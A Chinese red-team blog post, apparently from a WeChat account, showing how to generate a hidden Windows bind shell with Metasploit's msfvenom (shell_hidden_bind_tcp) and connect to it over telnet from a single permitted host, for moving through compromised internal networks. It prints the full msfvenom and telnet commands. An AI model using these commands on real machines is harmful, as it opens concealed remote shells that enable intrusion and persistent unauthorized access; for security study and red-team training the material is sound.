渗透攻击红队
一个专注于红队攻击的公众号
大家好,这里是 渗透攻击红队 的第 50 篇文章,本公众号会记录一些红队攻击的笔记(由浅到深),不定时更新
在内网渗透中,正向 bind shell 会经常用到,可能有些兄弟还不清楚什么是正向 shell:反向 reverse shell 就是通过我们监听,目标肉鸡运行 exe 我们就会收到一个反弹 shell;而正向就是目标肉鸡运行 exe,我们去连接肉鸡。
最近很多人说我发广告啥的,我只想说一句:所有的热爱都是在生活的前提上的,不管为了什么,前提是得保证能生存下去。
Metasploit 如何隐藏 Bind Shell
演示过程
首先通过 MSF 生成一个正向 shell:
msfvenom -p windows/shell_hidden_bind_tcp LPORT=8889 AHOST=192.168.84.128 -f exe > bind_shell.exe
之后再肉鸡上运行 bind_shell.exe :
这个时候再 Hacker 机器上使用 Telnet 连接目标机器的时候,就会反弹一个 cmd shel 到黑客机器:
telnet 192.168.84.154 8889
而此时使用其他机器与肉鸡建立 Telnet 是无法获取到 cmd shell 的:
这样的好处在于你在做内网的时候拿下一台跳板机器,利用这台跳板机器当作黑客,生成一个正向木马丢到内网其他机器里,随时就可以通过 telnet 获取目标的 cmd ,省去了一些麻烦。
https://evi1cg.me/archives/Don-t_touch_my_shell.html
本文始发于微信公众号(渗透攻击红队):Metasploit 通过隐藏 Bind Shell,只允许指定目标接收反弹 Shell
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论